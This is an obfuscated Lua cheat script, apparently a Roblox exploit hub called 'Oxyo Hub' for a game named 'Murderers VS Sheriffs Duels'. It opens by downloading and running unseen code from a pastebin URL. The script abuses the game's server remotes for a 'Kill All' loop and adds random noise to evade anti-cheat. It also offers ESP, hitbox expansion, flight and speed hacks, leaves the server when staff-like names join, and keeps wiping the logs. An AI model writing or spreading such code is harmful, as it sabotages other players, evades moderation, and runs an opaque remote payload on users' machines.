--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

loadstring(game:HttpGet("https://pastebin.com/raw/NVX9V7ve",true))();local v0=game:GetService("Players");local v1=game:GetService("RunService");local v2=game:GetService("Workspace");local v3=game:GetService("UserInputService");local v4=game:GetService("TeleportService");local v5=game:GetService("HttpService");local v6=game:GetService("ReplicatedStorage");local v7=v0.LocalPlayer;local v8=v2.CurrentCamera;local v9=v7;local function v10(v90,...) pcall(v90,...);end local v11={paused=false,pulseTick=tick(),pulseNext=18 + (math.random() * 12) ,killDelay=function() return 0.09 + (math.random() * 0.06) ;end,posNoise=function() return Vector3.new((math.random() -0.5) * 0.07 ,(math.random() -0.5) * 0.03 ,(math.random() -0.5) * 0.07 );end,dirNoise=function() return Vector3.new((math.random() -0.5) * 0.05 ,(math.random() -0.5) * 0.02 ,(math.random() -0.5) * 0.05 );end,tpJitter=function() return Vector3.new((math.random() -0.5) * 0.4 ,0,(math.random() -0.5) * 0.4 );end};task.spawn(function() while true do task.wait(1);local v217=tick();if ((v217-v11.pulseTick)>=v11.pulseNext) then v11.paused=true;task.wait(0.09 + (math.random() * 0.18) );v11.paused=false;v11.pulseTick=tick();v11.pulseNext=18 + (math.random() * 12) ;end end end);local v12={walk=24,jump=50};local function v13() local v91=v9.Character;if  not v91 then return nil;end return v91:FindFirstChildOfClass("Humanoid");end task.spawn(function() while true do task.wait(0.5);v10(function() local v327=v13();if  not v327 then return;end if (v327.WalkSpeed~=v12.walk) then v327.WalkSpeed=v12.walk;end if (v327.JumpPower~=v12.jump) then v327.JumpPower=v12.jump;end end);end end);local v14=loadstring(game:HttpGet("https://sirius.menu/rayfield"))();local v15=v14:CreateWindow({Name="Murderers VS Sheriffs Duels | Oxyo Hub",LoadingTitle="Oxyo Hub v2",LoadingSubtitle="by Mohammad",ConfigurationSaving={Enabled=true,FolderName="OXYOHub",FileName="MVS_v2"},Discord={Enabled=true,Invite="xdv74qutx5",RememberJoins=true},KeySystem=false});local v16={ESP={Enabled=false,Charm=true,Names=true,Health=true,Distance=true,Trace=false,Skeleton=false}};local v17=false;local v18={};local function v19() local v92=v7.Character;return v92 and v92:FindFirstChild("HumanoidRootPart") ;end local function v20() local v93=v7.Character;return v93 and v93:FindFirstChildOfClass("Humanoid") ;end local function v21() local v94=v7.Character;if  not v94 then return false;end if (v94.Parent~=v2) then return true;end if (v7.Team~=nil) then return true;end return false;end local function v22() if (v2:FindFirstChild("MatchObjects") and ( #v2.MatchObjects:GetChildren()>0)) then return true;end local v95=v19();if  not v95 then return false;end local v96=v95.Position;for v218,v219 in ipairs(v0:GetPlayers()) do if ((v219~=v7) and v219.Character) then local v368=v219.Character:FindFirstChild("HumanoidRootPart");if (v368 and ((v96-v368.Position).Magnitude<200)) then return true;end end end return false;end local function v23() v18={};if  not v17 then return;end local v97=v19();if  not v97 then return;end local v98=v97.Position;for v220,v221 in ipairs(v0:GetPlayers()) do if ((v221~=v7) and v221.Character and (v221.Character.Parent==v2)) then local v369=v221.Character:FindFirstChild("HumanoidRootPart");if (v369 and ((v98-v369.Position).Magnitude<300)) then table.insert(v18,v221);end end end end pcall(function() local v99=v6:WaitForChild("Match",6);if  not v99 then return;end local v100=v99:WaitForChild("OnMatchStarted",6);if  not v100 then return;end v100.OnClientEvent:Connect(function() v17=true;end);end);pcall(function() local v101=v6:WaitForChild("Remotes",6);if  not v101 then return;end local v102=v101:WaitForChild("OnRoundEnded",6);if  not v102 then return;end v102.OnClientEvent:Connect(function() v17=false;v18={};end);end);task.spawn(function() while true do task.wait(1.6 + (math.random() * 0.6) );local v222=v22();if (v222~=v17) then v17=v222;if  not v17 then v18={};end end if v17 then v23();end end end);local v24={};local v25={};local function v26(v103) if v24[v103] then return;end local v104=v103.Team==v7.Team ;local v105=(v104 and Color3.fromRGB(0,100,255)) or Color3.fromRGB(255,0,0) ;local v106={Charm=nil,Name=nil,Health=nil,Distance=nil,Trace=nil,Skeleton={}};pcall(function() v106.Name=Drawing.new("Text");v106.Health=Drawing.new("Text");v106.Distance=Drawing.new("Text");v106.Trace=Drawing.new("Line");for v328,v329 in pairs({v106.Name,v106.Health,v106.Distance}) do v329.Center=true;v329.Outline=true;v329.Transparency=1;v329.Visible=false;v329.Font=2;v329.Color=v105;end v106.Name.Size=16;v106.Health.Size=14;v106.Distance.Size=14;v106.Health.Color=Color3.fromRGB(0,255,0);v106.Trace.Thickness=2;v106.Trace.Color=v105;v106.Trace.Transparency=1;v106.Trace.Visible=false;for v336=1,13 do local v337=Drawing.new("Line");v337.Thickness=1;v337.Color=v105;v337.Transparency=1;v337.Visible=false;v106.Skeleton[v336]=v337;end end);v24[v103]=v106;local function v108(v235) task.wait(0.1);if ( not v235 or  not v235.Parent) then return;end if v106.Charm then pcall(function() v106.Charm:Destroy();end);v106.Charm=nil;end local v236=Instance.new("Highlight");v236.FillColor=v105;v236.OutlineColor=v105;v236.FillTransparency=0.5;v236.OutlineTransparency=0;v236.Enabled=false;v236.Parent=v235;v106.Charm=v236;end v25[v103]=v103.CharacterAdded:Connect(v108);if v103.Character then task.spawn(v108,v103.Character);end end local function v27(v110) if v25[v110] then v25[v110]:Disconnect();v25[v110]=nil;end local v111=v24[v110];if  not v111 then return;end if (v111.Charm and v111.Charm.Parent) then pcall(function() v111.Charm:Destroy();end);end for v244,v245 in pairs({"Name","Health","Distance","Trace"}) do if v111[v245] then pcall(function() v111[v245]:Remove();end);end end for v246,v247 in pairs(v111.Skeleton) do pcall(function() v247:Remove();end);end v24[v110]=nil;end local function v28(v113) if v113.Charm then pcall(function() v113.Charm.Enabled=false;end);end for v248,v249 in pairs({"Name","Health","Distance","Trace"}) do if v113[v249] then v113[v249].Visible=false;end end for v250,v251 in pairs(v113.Skeleton) do v251.Visible=false;end end local v29={};local function v30() if ( not v16.ESP.Enabled or  not v17) then for v373,v374 in pairs(v24) do v28(v374);end return;end v29={};for v253,v254 in ipairs(v18) do v29[v254]=true;end for v256,v257 in ipairs(v0:GetPlayers()) do if (v257==v7) then continue;end local v258=v257.Character;if  not v258 then continue;end if  not v24[v257] then v26(v257);end local v259=v24[v257];if  not v259 then continue;end if  not v29[v257] then v28(v259);continue;end local v260=v258:FindFirstChild("HumanoidRootPart");local v261=v258:FindFirstChild("Head");local v262=v258:FindFirstChildOfClass("Humanoid");if ( not (v260 and v261 and v262) or (v262.Health<=0)) then v28(v259);continue;end local v263=v257.Team==v7.Team ;local v264=(v263 and Color3.fromRGB(0,100,255)) or Color3.fromRGB(255,0,0) ;if v259.Charm then pcall(function() v259.Charm.FillColor=v264;v259.Charm.OutlineColor=v264;v259.Charm.Enabled=v16.ESP.Charm;end);end local v265,v266=v8:WorldToViewportPoint(v260.Position);if  not v266 then v28(v259);continue;end local v267=v8:WorldToViewportPoint(v261.Position + Vector3.new(0,0.5,0) );local v268=v8:WorldToViewportPoint(v260.Position-Vector3.new(0,3,0) );if v259.Name then if v16.ESP.Names then v259.Name.Text=v257.Name;v259.Name.Position=Vector2.new(v265.X,v267.Y-20 );v259.Name.Color=v264;v259.Name.Visible=true;else v259.Name.Visible=false;end end if v259.Health then if v16.ESP.Health then local v439=math.floor((v262.Health/v262.MaxHealth) * 100 );v259.Health.Text=v439   .. "%" ;v259.Health.Position=Vector2.new(v265.X,v268.Y + 5 );v259.Health.Color=Color3.fromRGB(math.clamp(255 -(v439 * 2.55) ,0,255),math.clamp(v439 * 2.55 ,0,255),0);v259.Health.Visible=true;else v259.Health.Visible=false;end end if v259.Distance then if v16.ESP.Distance then local v445=v19();if v445 then local v483=math.floor((v445.Position-v260.Position).Magnitude);v259.Distance.Text=v483   .. "m" ;v259.Distance.Position=Vector2.new(v265.X,v268.Y + 20 );v259.Distance.Color=v264;v259.Distance.Visible=true;end else v259.Distance.Visible=false;end end if v259.Trace then if v16.ESP.Trace then v259.Trace.From=Vector2.new(v8.ViewportSize.X/2 ,v8.ViewportSize.Y);v259.Trace.To=Vector2.new(v265.X,v265.Y);v259.Trace.Color=v264;v259.Trace.Visible=true;else v259.Trace.Visible=false;end end if v16.ESP.Skeleton then local function v375(v407,v408,v409) if  not v259.Skeleton[v407] then return;end local v410,v411=v8:WorldToViewportPoint(v408);local v412,v413=v8:WorldToViewportPoint(v409);if (v411 and v413) then v259.Skeleton[v407].From=Vector2.new(v410.X,v410.Y);v259.Skeleton[v407].To=Vector2.new(v412.X,v412.Y);v259.Skeleton[v407].Color=v264;v259.Skeleton[v407].Visible=true;else v259.Skeleton[v407].Visible=false;end end local v376={{"Head","UpperTorso"},{"UpperTorso","LowerTorso"},{"UpperTorso","LeftUpperArm"},{"LeftUpperArm","LeftLowerArm"},{"LeftLowerArm","LeftHand"},{"UpperTorso","RightUpperArm"},{"RightUpperArm","RightLowerArm"},{"RightLowerArm","RightHand"},{"LowerTorso","LeftUpperLeg"},{"LeftUpperLeg","LeftLowerLeg"},{"LeftLowerLeg","LeftFoot"},{"LowerTorso","RightUpperLeg"},{"RightUpperLeg","RightLowerLeg"}};for v414,v415 in ipairs(v376) do local v416=v258:FindFirstChild(v415[1]);local v417=v258:FindFirstChild(v415[2]);if (v416 and v417) then v375(v414,v416.Position,v417.Position);end end else for v418,v419 in pairs(v259.Skeleton) do v419.Visible=false;end end end end v0.PlayerAdded:Connect(function(v114) v114.CharacterAdded:Wait();v26(v114);end);v0.PlayerRemoving:Connect(v27);for v115,v116 in ipairs(v0:GetPlayers()) do if (v116~=v7) then v26(v116);end end _G.HeadSize=10;_G.Disabled=false;_G.HitboxTeam=true;_G.HitboxTrans=0.7;_G.HitboxColor=BrickColor.new("Really blue");task.spawn(function() while true do task.wait(0.05);if  not _G.Disabled then continue;end v10(function() for v377,v378 in ipairs(v0:GetPlayers()) do if rawequal(v378,v7) then continue;end pcall(function() local v421=v378.Character;if ( not v421 or  not v421.Parent) then return;end local v422=v421:FindFirstChild("HumanoidRootPart");if  not v422 then return;end local v423=v421:FindFirstChildOfClass("Humanoid");if ( not v423 or (v423.Health<=0)) then v422.Size=Vector3.new(2,2,1);v422.Transparency=1;v422.Material=Enum.Material.SmoothPlastic;v422.CanCollide=false;return;end if (_G.HitboxTeam and rawequal(v378.Team,v7.Team)) then v422.Size=Vector3.new(2,2,1);v422.Transparency=1;v422.Material=Enum.Material.SmoothPlastic;v422.CanCollide=true;return;end v422.Size=Vector3.new(_G.HeadSize,_G.HeadSize,_G.HeadSize);v422.Transparency=_G.HitboxTrans;v422.BrickColor=_G.HitboxColor;v422.Material=Enum.Material.Neon;v422.CanCollide=false;end);end end);end end);local v31={WalkSpeed={Enabled=false,Value=24},JumpPower={Enabled=false,Value=50},Flight={Enabled=false,Speed=50},SpinBot={Enabled=false,Speed=10},Headless={Enabled=false},Korblox={Enabled=false}};local v32=nil;local v33=nil;local v34=nil;local v35=false;local v36=nil;local v37=false;local v38=false;local v39=tick();local v40=12 + (math.random() * 8) ;local v41=0;local v42=0;local v43=tick();local v44=Vector3.zero;local function v45() if v36 then return;end if  not (v3.TouchEnabled and  not v3.KeyboardEnabled) then return;end local v117=Instance.new("ScreenGui");v117.Name="OXYOFlight";v117.ResetOnSpawn=false;v117.IgnoreGuiInset=true;v117.Parent=game:GetService("CoreGui");local function v122(v269,v270,v271) local v272=Instance.new("TextButton");v272.Size=UDim2.new(0,85,0,85);v272.Position=UDim2.new(0,v270,1,v271);v272.AnchorPoint=Vector2.new(0,1);v272.BackgroundColor3=Color3.fromRGB(15,15,15);v272.BackgroundTransparency=0.25;v272.TextColor3=Color3.fromRGB(255,255,255);v272.Text=v269;v272.Font=Enum.Font.GothamBold;v272.TextSize=32;v272.AutoButtonColor=false;v272.ZIndex=10;v272.Parent=v117;local v286=Instance.new("UICorner");v286.CornerRadius=UDim.new(0,18);v286.Parent=v272;local v289=Instance.new("UIStroke");v289.Color=Color3.fromRGB(200,200,200);v289.Transparency=0.5;v289.Thickness=2;v289.Parent=v272;return v272;end local v123=v122("▲",20, -105);local v124=v122("▼",20, -10);v123.MouseButton1Down:Connect(function() v37=true;end);v123.MouseButton1Up:Connect(function() v37=false;end);v123.MouseLeave:Connect(function() v37=false;end);v124.MouseButton1Down:Connect(function() v38=true;end);v124.MouseButton1Up:Connect(function() v38=false;end);v124.MouseLeave:Connect(function() v38=false;end);v36=v117;end local function v46() if v36 then v36:Destroy();v36=nil;end v37=false;v38=false;end local function v47() local v125=v19();local v126=v20();if ( not v125 or  not v126) then return;end pcall(function() v126:SetStateEnabled(Enum.HumanoidStateType.FallingDown,false);v126:SetStateEnabled(Enum.HumanoidStateType.Ragdoll,false);v126:ChangeState(Enum.HumanoidStateType.Climbing);end);v33=Instance.new("Attachment");v33.Name="FlightAtt";v33.Parent=v125;local v129=pcall(function() local v294=Instance.new("LinearVelocity");v294.Name="FlightLV";v294.Attachment0=v33;v294.VelocityConstraintMode=Enum.VelocityConstraintMode.Vector;v294.VectorVelocity=Vector3.zero;v294.MaxForce=9000 + math.random( -300,300) ;v294.RelativeTo=Enum.ActuatorRelativeTo.World;v294.Parent=v125;v32=v294;end);if  not v129 then v35=false;local v344=Instance.new("BodyVelocity");v344.Name="FlightLV";v344.Velocity=Vector3.zero;v344.MaxForce=Vector3.new(90000,90000,90000);v344.Parent=v125;v32=v344;else v35=true;end v34=Instance.new("BodyGyro");v34.MaxTorque=Vector3.new(4000,4000,4000);v34.P=3000;v34.D=200;v34.CFrame=v125.CFrame;v34.Parent=v125;v44=Vector3.zero;v39=tick();v40=12 + (math.random() * 8) ;v45();end local function v48() local v137=v20();if v137 then pcall(function() v137:SetStateEnabled(Enum.HumanoidStateType.FallingDown,true);v137:SetStateEnabled(Enum.HumanoidStateType.Ragdoll,true);v137:ChangeState(Enum.HumanoidStateType.GettingUp);end);end if v32 then pcall(function() v32:Destroy();end);v32=nil;end if v33 then pcall(function() v33:Destroy();end);v33=nil;end if v34 then pcall(function() v34:Destroy();end);v34=nil;end v35=false;v46();end local v49={};local function v50(v138) local v139=v7.Character;if  not v139 then return;end if v138 then for v379,v380 in pairs(v139:GetDescendants()) do if (v380:IsA("BasePart") and (v380.Name=="Head")) then v49[v380]=v380.Transparency;pcall(function() v380.Transparency=1;end);elseif (v380:IsA("Decal") and v380.Parent and (v380.Parent.Name=="Head")) then v49[v380]=v380.Transparency;pcall(function() v380.Transparency=1;end);elseif (v380:IsA("SpecialMesh") and v380.Parent and (v380.Parent.Name=="Head")) then v49[v380]=v380.Scale;pcall(function() v380.Scale=Vector3.new(0,0,0);end);end end for v381,v382 in pairs(v139:GetChildren()) do if v382:IsA("Accessory") then local v454=v382:FindFirstChild("Handle");if v454 then local v490=v454:FindFirstChildOfClass("Attachment");if (v490 and (v490.Name:find("Hat") or v490.Name:find("Hair") or v490.Name:find("Face"))) then v49[v454]=v454.Transparency;pcall(function() v454.Transparency=1;end);end end end end else for v383,v384 in pairs(v49) do pcall(function() if v383:IsA("SpecialMesh") then v383.Scale=v384;else v383.Transparency=v384;end end);end v49={};end end local v51={};local function v52(v140) local v141=v7.Character;if  not v141 then return;end if v140 then for v385,v386 in pairs({"LeftUpperLeg","LeftLowerLeg","LeftFoot","Left Leg"}) do local v387=v141:FindFirstChild(v386);if (v387 and v387:IsA("BasePart")) then v51[v387]=v387.Transparency;pcall(function() v387.Transparency=1;end);end end else for v388,v389 in pairs(v51) do pcall(function() v388.Transparency=v389;end);end v51={};end end v7.CharacterAdded:Connect(function() task.wait(0.5);if v31.Flight.Enabled then v48();task.wait(0.3);v47();end task.wait(0.5);if v31.Headless.Enabled then v50(true);end if v31.Korblox.Enabled then v52(true);end end);v1.RenderStepped:Connect(function(v142) pcall(v30);if  not v31.Flight.Enabled then return;end if ( not v32 or  not v34) then return;end local v143=v19();if  not v143 then return;end local v144=tick();if ((v144-v39)>v40) then v39=v144;v40=12 + (math.random() * 8) ;task.spawn(function() if  not v32 then return;end pcall(function() if v35 then v32.MaxForce=0;else v32.MaxForce=Vector3.zero;end end);task.wait(0.05 + (math.random() * 0.08) );if  not v32 then return;end pcall(function() if v35 then v32.MaxForce=9000 + math.random( -300,300) ;else v32.MaxForce=Vector3.new(90000,90000,90000);end end);end);end if ((v144-v43)>0.2) then v41=math.random( -10,10) * 0.008 ;v42=math.random( -10,10) * 0.008 ;v43=v144;end local v145=math.min(v31.Flight.Speed,80);local v146=v8.CFrame;local v147=Vector3.zero;if v3.KeyboardEnabled then if v3:IsKeyDown(Enum.KeyCode.W) then v147=v147 + v146.LookVector ;end if v3:IsKeyDown(Enum.KeyCode.S) then v147=v147-v146.LookVector ;end if v3:IsKeyDown(Enum.KeyCode.D) then v147=v147 + v146.RightVector ;end if v3:IsKeyDown(Enum.KeyCode.A) then v147=v147-v146.RightVector ;end if (v3:IsKeyDown(Enum.KeyCode.E) or v3:IsKeyDown(Enum.KeyCode.Space)) then v147=v147 + Vector3.new(0,1,0) ;end if (v3:IsKeyDown(Enum.KeyCode.Q) or v3:IsKeyDown(Enum.KeyCode.LeftShift)) then v147=v147-Vector3.new(0,1,0) ;end else local v350=v20();if (v350 and (v350.MoveDirection.Magnitude>0)) then v147=Vector3.new(v350.MoveDirection.X,0,v350.MoveDirection.Z);end if v37 then v147=v147 + Vector3.new(0,1,0) ;end if v38 then v147=v147-Vector3.new(0,1,0) ;end end local v148;if (v147.Magnitude>0) then local v351=v147.Unit * v145 ;v148=Vector3.new(v351.X + v41 ,v351.Y,v351.Z + v42 );else v148=Vector3.new(0, -0.8 + (math.random( -2,2) * 0.05) ,0);end v44=v44:Lerp(v148,math.min(1,v142 * 8 ));pcall(function() if v35 then v32.VectorVelocity=v44;else v32.Velocity=v44;end v34.CFrame=CFrame.new(Vector3.zero,v146.LookVector);end);end);v1.Heartbeat:Connect(function() if  not v31.SpinBot.Enabled then return;end local v149=v19();if  not v149 then return;end pcall(function() local v306=math.random( -2,2) * 0.1 ;v149.CFrame=v149.CFrame * CFrame.Angles(0,math.rad(v31.SpinBot.Speed + v306 ),0) ;end);end);local v53=v15:CreateTab("Hitbox",4483362458);local v54=v15:CreateTab("ESP",4483362458);local v55=v15:CreateTab("Player",4483362458);v53:CreateSection("Hitbox Expander");v53:CreateToggle({Name="Enable Hitbox",CurrentValue=false,Flag="HitboxEnabled",Callback=function(v150) _G.Disabled=v150;end});v53:CreateSlider({Name="Hitbox Size",Range={1,100},Increment=1,CurrentValue=10,Flag="HitboxSize",Callback=function(v151) _G.HeadSize=v151;end});v53:CreateSlider({Name="Hitbox Transparency",Range={0,1},Increment=0.1,CurrentValue=0.7,Flag="HitboxTransparency",Callback=function(v152) _G.HitboxTrans=v152;end});v53:CreateColorPicker({Name="Hitbox Color",Color=Color3.fromRGB(0,0,255),Flag="HitboxColor",Callback=function(v153) _G.HitboxColor=BrickColor.new(v153);end});v53:CreateSection("Checks");v53:CreateToggle({Name="Team Check",CurrentValue=true,Flag="TeamCheck",Callback=function(v154) _G.HitboxTeam=v154;end});v54:CreateSection("ESP");v54:CreateToggle({Name="Enable ESP",CurrentValue=false,Flag="ESPEnabled",Callback=function(v155) v16.ESP.Enabled=v155;end});v54:CreateToggle({Name="ESP Charm",CurrentValue=true,Flag="ESPCharm",Callback=function(v157) v16.ESP.Charm=v157;end});v54:CreateToggle({Name="ESP Names",CurrentValue=true,Flag="ESPNames",Callback=function(v159) v16.ESP.Names=v159;end});v54:CreateToggle({Name="ESP Health",CurrentValue=true,Flag="ESPHealth",Callback=function(v161) v16.ESP.Health=v161;end});v54:CreateToggle({Name="ESP Distance",CurrentValue=true,Flag="ESPDistance",Callback=function(v163) v16.ESP.Distance=v163;end});v54:CreateToggle({Name="ESP Trace",CurrentValue=false,Flag="ESPTrace",Callback=function(v165) v16.ESP.Trace=v165;end});v54:CreateToggle({Name="ESP Skeleton",CurrentValue=false,Flag="ESPSkeleton",Callback=function(v167) v16.ESP.Skeleton=v167;end});v55:CreateSection("Movement");v55:CreateToggle({Name="WalkSpeed",CurrentValue=false,Flag="WSEnabled",Callback=function(v169) v31.WalkSpeed.Enabled=v169;v12.walk=(v169 and v31.WalkSpeed.Value) or 24 ;end});v55:CreateSlider({Name="WalkSpeed Value",Range={24,100},Increment=1,CurrentValue=24,Flag="WSValue",Callback=function(v172) v31.WalkSpeed.Value=v172;if v31.WalkSpeed.Enabled then v12.walk=v172;end end});v55:CreateToggle({Name="JumpPower",CurrentValue=false,Flag="JPEnabled",Callback=function(v174) v31.JumpPower.Enabled=v174;if v174 then v12.jump=v31.JumpPower.Value;local v355=v20();if v355 then pcall(function() v355.UseJumpPower=true;end);end else v12.jump=50;end end});v55:CreateSlider({Name="JumpPower Value",Range={50,85},Increment=5,CurrentValue=50,Flag="JPValue",Callback=function(v176) v31.JumpPower.Value=v176;if v31.JumpPower.Enabled then v12.jump=v176;end end});v55:CreateToggle({Name="Flight",CurrentValue=false,Flag="FlightEnabled",Callback=function(v178) v31.Flight.Enabled=v178;if v178 then v47();else v48();end end});v55:CreateSlider({Name="Flight Speed",Range={10,100},Increment=5,CurrentValue=50,Flag="FlightSpeed",Callback=function(v180) v31.Flight.Speed=v180;end});v55:CreateSection("Combat");v55:CreateToggle({Name="Spin Bot",CurrentValue=false,Flag="SpinBotEnabled",Callback=function(v182) v31.SpinBot.Enabled=v182;end});v55:CreateSlider({Name="Spin Speed",Range={1,30},Increment=1,CurrentValue=10,Flag="SpinSpeed",Callback=function(v184) v31.SpinBot.Speed=v184;end});v55:CreateSection("Cosmetics");v55:CreateToggle({Name="Headless",CurrentValue=false,Flag="HeadlessEnabled",Callback=function(v186) v31.Headless.Enabled=v186;v50(v186);end});v55:CreateToggle({Name="Korblox",CurrentValue=false,Flag="KorbloxEnabled",Callback=function(v188) v31.Korblox.Enabled=v188;v52(v188);end});local v56,v57,v58;pcall(function() v56=v6:WaitForChild("Remotes",10);v57=v56 and v56:WaitForChild("ThrowStart",10) ;v58=v56 and v56:WaitForChild("ThrowHit",10) ;end);local v59={"gun","pistol","revolver","rifle","shotgun","shoot","bullet"};local function v60(v190) if ( not v190 or  not v190:IsA("Tool")) then return false;end local v191=v190.Name:lower();for v308,v309 in ipairs(v59) do if v191:find(v309) then return true;end end return false;end local function v61() local v192=v7.Character;if  not v192 then return;end local v193=v192:FindFirstChildOfClass("Humanoid");if  not v193 then return;end local v194=v192:FindFirstChildOfClass("Tool");if (v194 and  not v60(v194)) then return;end local v195=nil;for v310,v311 in ipairs(v7.Backpack:GetChildren()) do if (v311:IsA("Tool") and  not v60(v311)) then v195=v311;break;end end if v195 then pcall(function() v193:EquipTool(v195);end);task.wait(0.15);elseif (v194 and v60(v194)) then pcall(function() v193:UnequipTools();end);task.wait(0.15);end end local function v62() if v11.paused then return;end if ( not v57 or  not v58) then return;end pcall(function() local v312=v7.Character;if  not v312 then return;end local v313=v312:FindFirstChild("HumanoidRootPart");if  not v313 then return;end v61();local v314=v313.Position;for v358,v359 in ipairs(v0:GetPlayers()) do pcall(function() if rawequal(v359,v7) then return;end local v392=v359.Character;if ( not v392 or  not v392.Parent) then return;end local v393=v392:FindFirstChild("HumanoidRootPart");if  not v393 then return;end local v394=v392:FindFirstChildOfClass("Humanoid");if (v394 and (v394.Health<=0)) then return;end local v395=v393.Position;local v396=v395-v314 ;if (v396.Magnitude>0) then v396=v396.Unit;end pcall(function() v57:FireServer(v314 + v11.posNoise() ,v396 + v11.dirNoise() );end);task.wait(0.018 + (math.random() * 0.022) );pcall(function() v58:FireServer(v393,v395 + v11.posNoise() );end);pcall(function() v58:FireServer(v393,v395 + v11.posNoise() );end);pcall(function() v58:FireServer(v393,v395 + v11.posNoise() );end);end);end end);end local v63=0;local v64=false;local v65=0;local function v66() v65=v65 + 1 ;local v196=v65;task.spawn(function() while v64 and (v65==v196)  do if  not v11.paused then pcall(v62);end task.wait(v11.killDelay());end end);end local function v67() v64=false;v65=v65 + 1 ;end local v68=v15:CreateTab("Kill All",4483362458);v68:CreateSection("Kill");v68:CreateButton({Name="Kill All",Callback=function() local v197=tick();if ((v197-v63)<0.5) then return;end v63=v197;v62();end});local v69=v68:CreateToggle({Name="Loop Kill All",CurrentValue=false,Flag="LoopKillEnabled",Callback=function(v198) if v198 then v64=true;v66();else v67();end end});local v70={Enabled=false};local function v71() local v199=v2:FindFirstChild("Lobby");if  not v199 then return nil;end local v200=v199:FindFirstChild("DuelRingsGroup");if  not v200 then return nil;end local v201=v200:FindFirstChild("DuelRing_1v1");if  not v201 then return nil;end for v315,v316 in ipairs(v201:GetChildren()) do if (v316.Name=="DuelPad") then local v397=v316:FindFirstChild("Pad");if v397 then return v397.Position + Vector3.new(0,3,0) ;end end end return nil;end local function v72() if v21() then return;end pcall(function() local v317=v71();if  not v317 then return;end local v318=v19();if  not v318 then return;end v318.CFrame=CFrame.new(v317 + v11.tpJitter() );end);end local function v73() v70.Enabled=false;v67();pcall(function() v69:Set(false);end);end local function v74() v70.Enabled=true;v72();task.spawn(function() local v320=nil;while v70.Enabled do task.wait(0.38 + (math.random() * 0.24) );local v360=(v21() and "MATCH") or "LOBBY" ;if (v360~=v320) then if (v360=="MATCH") then task.wait(0.2 + (math.random() * 0.2) );if  not v70.Enabled then break;end v64=true;v66();pcall(function() v69:Set(true);end);elseif (v360=="LOBBY") then v67();pcall(function() v69:Set(false);end);task.wait(3.5 + (math.random() * 1.2) );if  not v70.Enabled then break;end v72();end v320=v360;end if ((v360=="MATCH") and  not v64) then v64=true;v66();pcall(function() v69:Set(true);end);end end end);end local v75="https://raw.githubusercontent.com/mohammadahmadqazplm-gif/ms2d/refs/heads/main/ms2";local v76=4;local v77=false;local v78=false;local function v79() pcall(function() local v321={};local v322,v323=pcall(function() return game:HttpGet("https://games.roblox.com/v1/games/"   .. game.PlaceId   .. "/servers/Public?sortOrder=Asc&limit=100" );end);if  not v322 then return;end local v324=v5:JSONDecode(v323);if ( not v324 or  not v324.data) then return;end for v361,v362 in ipairs(v324.data) do if ((v362.id~=game.JobId) and v362.playing and (v362.playing>v76)) then table.insert(v321,v362.id);end end if ( #v321==0) then v4:Teleport(game.PlaceId,v7);else local v398=v321[math.random(1, #v321)];v4:TeleportToPlaceInstance(game.PlaceId,v398,v7);end end);end task.spawn(function() while true do task.wait(10);if  not v77 then continue;end if ( #v0:GetPlayers()<=v76) then if  not v78 then v78=true;if  not _G.OXYOAutoExec then _G.OXYOAutoExec=v75;end end task.wait(2);v79();break;end end end);local v80=v15:CreateTab("Auto Farm",4483362458);v80:CreateSection("Auto Farm");v80:CreateToggle({Name="Enable Auto Farm",CurrentValue=false,Flag="AutoFarmEnabled",Callback=function(v204) if v204 then v74();else v73();end end});v80:CreateSection("Server");v80:CreateToggle({Name="Auto Server Hop (low players)",CurrentValue=false,Flag="AutoHopEnabled",Callback=function(v205) v77=v205;v78=false;end});v80:CreateSlider({Name="Min Players Threshold",Range={2,10},Increment=1,CurrentValue=4,Flag="HopThreshold",Callback=function(v206) v76=v206;end});local v81=v15:CreateTab("Utility",4483362458);v81:CreateSection("Anti AFK");local v82;local v83;v81:CreateToggle({Name="Anti AFK",CurrentValue=false,Flag="AntiAFK",Callback=function(v207) if v82 then v82:Disconnect();v82=nil;end if v83 then v83:Disconnect();v83=nil;end if  not v207 then return;end local function v208() pcall(function() local v363=game:GetService("VirtualUser");v363:Button2Down(Vector2.new(0,0),v8.CFrame);task.wait(0.1);v363:Button2Up(Vector2.new(0,0),v8.CFrame);end);end v82=v7.Idled:Connect(v208);local v209=tick();v83=v1.Heartbeat:Connect(function() if ((tick() -v209)>55) then v209=tick();pcall(v208);end end);end});v81:CreateSection("Anti Staff");local v84=false;local v85=0;local v86={"mod","admin","staff","moderator","roblox","helper","support","watch"};local function v87(v210) if rawequal(v210,v7) then return false;end if (v210.UserId<0) then return false;end local v211=v210.Name:lower();for v325,v326 in ipairs(v86) do if v211:find(v326,1,true) then return true;end end return false;end local function v88(v212) if  not v84 then return;end if  not v87(v212) then return;end local v213=tick();if ((v213-v85)<8) then return;end v85=v213;pcall(function() v4:Teleport(game.PlaceId,v7);end);end v0.PlayerAdded:Connect(v88);task.spawn(function() while true do task.wait(5 + (math.random() * 2) );if v84 then for v431,v432 in ipairs(v0:GetPlayers()) do v88(v432);end end end end);v81:CreateToggle({Name="Anti Staff",CurrentValue=false,Flag="AntiStaff",Callback=function(v214) v84=v214;end});v81:CreateSection("Auto Rejoin");local v89=false;v0.PlayerRemoving:Connect(function(v215) if  not v89 then return;end if  not rawequal(v215,v7) then return;end task.wait(1);pcall(function() v4:Teleport(game.PlaceId,v7);end);end);v81:CreateToggle({Name="Auto Rejoin + Execute",CurrentValue=false,Flag="AutoRejoin",Callback=function(v216) v89=v216;if v216 then _G.OXYOAutoExec=v75;_G.OXYOAutoExecID=game.PlaceId;else _G.OXYOAutoExec=nil;_G.OXYOAutoExecID=nil;end end});pcall(function() v14:LoadConfiguration();end);task.spawn(function() while true do pcall(function() game:GetService("LogService"):ClearOutput();end);pcall(function() if consoleClear then consoleClear();end end);pcall(function() if cloneref then cloneref(game:GetService("LogService")):ClearOutput();end end);task.wait(0.001);end end);
